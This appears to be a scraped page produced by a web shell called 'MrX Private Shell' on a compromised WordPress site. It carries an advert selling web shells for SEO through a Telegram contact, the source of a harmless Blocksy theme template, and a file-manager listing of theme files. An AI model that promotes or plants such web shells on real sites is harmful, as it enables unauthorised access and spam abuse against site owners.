__ __ __ __ _____ _ _ _____ _ _ _ | \/ | \ \ / / | __ \ (_) | | / ____| | | | | | \ / |_ __\ V / | |__) | __ ___ ____ _| |_ ___ | (___ | |__ ___| | | | |\/| | '__|> < | ___/ '__| \ \ / / _` | __/ _ \ \___ \| '_ \ / _ \ | | | | | | |_ / . \ | | | | | |\ V / (_| | || __/ ____) | | | | __/ | | |_| |_|_(_)_/ \_\ |_| |_| |_| \_/ \__,_|\__\___| |_____/|_| |_|\___V 2.1 if you need WebShell for Seo everyday contact me on Telegram Telegram Address : @jackleetFor_More_Tools:
<?php
/**
* Template part for displaying a message that posts cannot be found
*
* @link https://developer.wordpress.org/themes/basics/template-hierarchy/
*
* @package Blocksy
*/
echo '<div class="entry-content is-layout-flow">';
if (is_home() && current_user_can('publish_posts')) {
printf(
'<p>' . wp_kses(
/* translators: 1: link to WP admin new post page open 2: link closing. */
__('Ready to publish your first post? %1$sGet started here%2$s.', 'blocksy'),
[
'a' => [
'href' => []
]
]
) . '</p>',
'<a href="' . esc_url(admin_url('post-new.php')) . '">',
'</a>'
);
} else {
get_search_form();
}
echo '</div>';
| Name | Type | Size | Permission | Actions |
|---|---|---|---|---|
| 404.php | File | 629 B | 0640 |
|
| archive.php | File | 1.16 KB | 0640 |
|
| content-none.php | File | 659 B | 0640 |
|
| single.php | File | 1.84 KB | 0640 |
|